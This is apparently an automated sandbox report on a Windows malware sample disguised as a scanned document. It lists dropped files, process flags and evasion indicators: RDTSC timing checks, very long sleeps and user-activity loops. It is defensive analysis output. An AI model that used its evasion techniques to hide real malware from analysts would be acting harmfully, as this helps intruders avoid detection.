Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000005C7244 second address: 00000000005C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000005C74AE second address: 00000000005C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000637244 second address: 000000000063724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000006374AE second address: 00000000006374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_004073E0 rdtsc 5_2_004073E0
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeThread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3420Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1431Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3629
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1275
Found large amount of non-executed APIsShow sources
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeAPI coverage: 3.9 %